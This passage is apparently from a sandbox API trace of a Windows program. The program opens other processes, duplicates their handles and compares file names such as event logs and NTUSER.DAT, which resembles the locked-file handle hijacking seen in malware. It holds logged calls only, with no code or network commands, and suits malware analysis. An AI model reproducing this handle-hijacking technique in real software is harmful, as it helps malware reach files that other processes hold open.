_wcsicmp (_Str1="\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0152.701] CloseHandle (hObject=0x680) returned 1 [0152.701] CloseHandle (hObject=0x62c) returned 1 [0152.701] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0152.701] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x598, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.701] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.701] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.702] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.702] CloseHandle (hObject=0x670) returned 1 [0152.702] _wcsicmp (_Str1="\\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0152.702] CloseHandle (hObject=0x680) returned 1 [0152.702] CloseHandle (hObject=0x62c) returned 1 [0152.702] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0152.702] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5a0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.702] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.703] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.705] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.705] CloseHandle (hObject=0x670) returned 1 [0152.705] _wcsicmp (_Str1="\\Microsoft-Windows-NCSI%4Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0152.705] CloseHandle (hObject=0x680) returned 1 [0152.705] CloseHandle (hObject=0x62c) returned 1 [0152.705] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0152.705] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5b0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.705] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.706] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.707] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.707] CloseHandle (hObject=0x670) returned 1 [0152.707] _wcsicmp (_Str1="\\Microsoft-Windows-Application-Experience%4Program-Telemetry.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0152.707] CloseHandle (hObject=0x680) returned 1 [0152.707] CloseHandle (hObject=0x62c) returned 1 [0152.707] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0152.707] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5b8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.707] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.708] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.709] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.709] CloseHandle (hObject=0x670) returned 1 [0152.709] _wcsicmp (_Str1="\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0152.709] CloseHandle (hObject=0x680) returned 1 [0152.709] CloseHandle (hObject=0x62c) returned 1 [0152.709] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0152.709] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5bc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.709] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.710] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.710] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.710] CloseHandle (hObject=0x670) returned 1 [0152.710] _wcsicmp (_Str1="\\Microsoft-Windows-Application-Experience%4Program-Inventory.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0152.710] CloseHandle (hObject=0x680) returned 1 [0152.710] CloseHandle (hObject=0x62c) returned 1 [0152.710] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0152.710] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5c0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.711] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.711] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.712] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.712] CloseHandle (hObject=0x670) returned 1 [0152.712] _wcsicmp (_Str1="\\Microsoft-Windows-Application-Experience%4Problem-Steps-Recorder.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0152.712] CloseHandle (hObject=0x680) returned 1 [0152.712] CloseHandle (hObject=0x62c) returned 1 [0152.712] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0152.712] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5c4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.712] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.713] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.713] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.713] CloseHandle (hObject=0x670) returned 1 [0152.714] _wcsicmp (_Str1="\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Troubleshooter.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0152.714] CloseHandle (hObject=0x680) returned 1 [0152.714] CloseHandle (hObject=0x62c) returned 1 [0152.714] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0152.714] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5cc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.714] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.714] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.715] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.715] CloseHandle (hObject=0x670) returned 1 [0152.715] _wcsicmp (_Str1="\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0152.715] CloseHandle (hObject=0x680) returned 1 [0152.715] CloseHandle (hObject=0x62c) returned 1 [0152.715] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0152.715] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5d0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.715] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.716] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.717] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.717] CloseHandle (hObject=0x670) returned 1 [0152.717] _wcsicmp (_Str1="\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0152.717] CloseHandle (hObject=0x680) returned 1 [0152.717] CloseHandle (hObject=0x62c) returned 1 [0152.717] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0152.717] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5e0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.717] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.718] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.718] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.719] CloseHandle (hObject=0x670) returned 1 [0152.719] _wcsicmp (_Str1="\\Microsoft-Windows-NetworkProfile%4Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0152.719] CloseHandle (hObject=0x680) returned 1 [0152.719] CloseHandle (hObject=0x62c) returned 1 [0152.719] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0152.719] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5e8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.719] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.720] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.720] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.720] CloseHandle (hObject=0x670) returned 1 [0152.720] _wcsicmp (_Str1="\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0152.720] CloseHandle (hObject=0x680) returned 1 [0152.720] CloseHandle (hObject=0x62c) returned 1 [0152.721] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0152.721] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x600, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.721] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.721] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.722] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.722] CloseHandle (hObject=0x670) returned 1 [0152.722] _wcsicmp (_Str1="\\Microsoft-Windows-NetworkAccessProtection%4Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0152.722] CloseHandle (hObject=0x680) returned 1 [0152.722] CloseHandle (hObject=0x62c) returned 1 [0152.722] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0152.722] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x620, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.722] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.723] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.723] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.723] CloseHandle (hObject=0x670) returned 1 [0152.723] _wcsicmp (_Str1="\\Microsoft-Windows-WindowsBackup%4ActionCenter.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0152.723] CloseHandle (hObject=0x680) returned 1 [0152.724] CloseHandle (hObject=0x62c) returned 1 [0152.724] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0152.724] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x62c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.724] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.724] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.725] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.725] CloseHandle (hObject=0x670) returned 1 [0152.725] _wcsicmp (_Str1="\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0152.725] CloseHandle (hObject=0x680) returned 1 [0152.725] CloseHandle (hObject=0x62c) returned 1 [0152.725] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0152.725] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x634, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.725] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.726] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.727] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.727] CloseHandle (hObject=0x670) returned 1 [0152.727] CloseHandle (hObject=0x680) returned 1 [0152.727] CloseHandle (hObject=0x62c) returned 1 [0152.727] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0152.727] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x638, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.727] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.728] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.728] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.728] CloseHandle (hObject=0x670) returned 1 [0152.728] CloseHandle (hObject=0x680) returned 1 [0152.728] CloseHandle (hObject=0x62c) returned 1 [0152.729] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0152.729] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x690, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.729] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.729] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.730] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.730] CloseHandle (hObject=0x670) returned 1 [0152.730] _wcsicmp (_Str1="\\Microsoft-Windows-WindowsUpdateClient%4Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0152.730] CloseHandle (hObject=0x680) returned 1 [0152.730] CloseHandle (hObject=0x62c) returned 1 [0152.730] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0152.730] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x6c0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.730] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.731] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.732] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.732] CloseHandle (hObject=0x670) returned 1 [0152.732] _wcsicmp (_Str1="\\WindowsUpdate.log", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0152.732] CloseHandle (hObject=0x680) returned 1 [0152.732] CloseHandle (hObject=0x62c) returned 1 [0152.732] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0152.732] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x72c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.732] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.733] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.735] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.735] CloseHandle (hObject=0x670) returned 1 [0152.735] _wcsicmp (_Str1="\\Microsoft-Windows-NetworkAccessProtection%4WHC.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0152.735] CloseHandle (hObject=0x680) returned 1 [0152.735] CloseHandle (hObject=0x62c) returned 1 [0152.735] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0152.735] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x73c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.735] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.736] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.737] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.737] CloseHandle (hObject=0x670) returned 1 [0152.737] _wcsicmp (_Str1="\\Microsoft-Windows-Windows Defender%4WHC.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0152.737] CloseHandle (hObject=0x680) returned 1 [0152.737] CloseHandle (hObject=0x62c) returned 1 [0152.737] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0152.737] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x748, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.737] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.738] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.739] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.739] CloseHandle (hObject=0x670) returned 1 [0152.739] _wcsicmp (_Str1="\\Microsoft-Windows-Diagnosis-Scheduled%4Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0152.739] CloseHandle (hObject=0x680) returned 1 [0152.739] CloseHandle (hObject=0x62c) returned 1 [0152.739] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0152.739] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x754, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.739] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.740] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.740] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.740] CloseHandle (hObject=0x670) returned 1 [0152.740] _wcsicmp (_Str1="\\Microsoft-Windows-Windows Defender%4Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0152.740] CloseHandle (hObject=0x680) returned 1 [0152.741] CloseHandle (hObject=0x62c) returned 1 [0152.741] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x62c [0152.741] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.741] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.741] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.742] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.742] CloseHandle (hObject=0x670) returned 1 [0152.742] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 5 [0152.742] CloseHandle (hObject=0x680) returned 1 [0152.742] CloseHandle (hObject=0x62c) returned 1 [0152.742] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x62c [0152.742] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.742] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.743] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.743] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.744] CloseHandle (hObject=0x670) returned 1 [0152.744] CloseHandle (hObject=0x680) returned 1 [0152.744] CloseHandle (hObject=0x62c) returned 1 [0152.744] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x62c [0152.744] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x15c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.744] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.744] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.745] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.745] CloseHandle (hObject=0x670) returned 1 [0152.745] CloseHandle (hObject=0x680) returned 1 [0152.745] CloseHandle (hObject=0x62c) returned 1 [0152.745] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x62c [0152.745] DuplicateHandle (in: 